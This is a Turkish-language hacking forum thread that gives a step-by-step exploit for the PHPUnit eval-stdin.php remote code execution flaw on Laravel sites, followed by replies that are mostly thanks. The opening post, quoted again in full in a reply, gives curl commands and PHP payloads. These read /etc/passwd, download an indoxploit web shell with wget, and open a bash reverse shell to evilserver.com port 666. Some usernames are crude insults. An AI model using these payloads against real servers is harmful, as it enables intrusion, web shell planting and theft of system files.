Laravel PHPUnit Remote Code Execution (RCE) (1 Viewer)

Crysuder · Sep 26, 2019

Vuln: eval-stdin.php
Tam Yol Exploit: http: // target /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Etkilenen sürümler: 4.8.28 öncesi ve 5.6.3 öncesi 5.x öncesi

Burp Suite, Postacı veya curl kullanarak veri göndermekte özgürsünüz. Burada ilk önce kıvırmayı kullanarak paylaşıyorum çünkü bence bu en basit olanı.

Yükü göndermek için -d veya -data parametresini kullanın. Kullanılabilecek yük kapasitesi:

View hidden content is available for registered users!

<?php system('tail /etc/passwd'); ?> <?php echo php_uname(); ?> <?php show_source('/etc/passwd'); ?>

Örnek komut

View hidden content is available for registered users!

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Eğer kabuğu çıkarmak istiyorsanız, sadece kullanmanız gereken yükü değiştirmeniz gerekiyor.

View hidden content is available for registered users!

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>

Veya backconnect bağlantı komu

View hidden content is available for registered users!

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>

Ardından, sunucuda, 666 numaralı bağlantı noktasına taşınır .

Veya Burpsuite'i kullanabilirsiniz.

Araya gir, sonra isteği tekrarlayıcıya gönder.

Ardından Tekrarlayıcı menüsünü tıklayın , aşağıya yükü girin ve Git düğmesine tıklayın .

Yanıt, istek sütununun yanında görülebilir (sağda).

Adamındibi · Sep 26, 2019

Hector said:
Vuln: eval-stdin.php

Tam Yol Exploit: http: // target /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Etkilenen sürümler: 4.8.28 öncesi ve 5.6.3 öncesi 5.x öncesi

Burp Suite, Postacı veya curl kullanarak veri göndermekte özgürsünüz. Burada ilk önce kıvırmayı kullanarak paylaşıyorum çünkü bence bu en basit olanı.

Yükü göndermek için -d veya -data parametresini kullanın. Kullanılabilecek yük kapasitesi:

View hidden content is available for registered users!

<?php system('tail /etc/passwd'); ?> <?php echo php_uname(); ?> <?php show_source('/etc/passwd'); ?>

Örnek komut

View hidden content is available for registered users!

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Eğer kabuğu çıkarmak istiyorsanız, sadece kullanmanız gereken yükü değiştirmeniz gerekiyor.

View hidden content is available for registered users!

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>

Veya backconnect bağlantı komu

View hidden content is available for registered users!

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>

Ardından, sunucuda, 666 numaralı bağlantı noktasına taşınır .

Veya Burpsuite'i kullanabilirsiniz.

Araya gir, sonra isteği tekrarlayıcıya gönder.

Ardından Tekrarlayıcı menüsünü tıklayın , aşağıya yükü girin ve Git düğmesine tıklayın .

Yanıt, istek sütununun yanında görülebilir (sağda).

teşekkür ederim @Hector

Zer03xpl0it · Sep 27, 2019

Eline sağlık

JFoundlow · Sep 27, 2019

Eline sağlık hector bey

risk-master · Sep 27, 2019

Eline sağlık. Güzel konu, beğendim.

Nogay · Sep 27, 2019

bakim

holyturk · Mar 1, 2020

ciddi bir açık.Kendi sitemde farkettim

H4rezm1 · Mar 1, 2020

eline sağlık

Akıncı · Mar 4, 2020

teşekkürler

Roselly · Mar 4, 2020

Eline sağlık.

clubsoundtr · Mar 10, 2020

bakalım

Mr.B · Sep 4, 2020

bakam

tttkkk · Sep 5, 2020

bklim

Laravel PHPUnit Remote Code Execution (RCE) (1 Viewer)

More options

Crysuder

Adamındibi

OROSPU EVLADIYIM

Zer03xpl0it

Free

JFoundlow

</ÖLÜ>

risk-master

Nogay

holyturk

H4rezm1

Akıncı

Roselly

clubsoundtr

Mr.B

Sövsem Bela S*ksem Zina

tttkkk

Users who are viewing this thread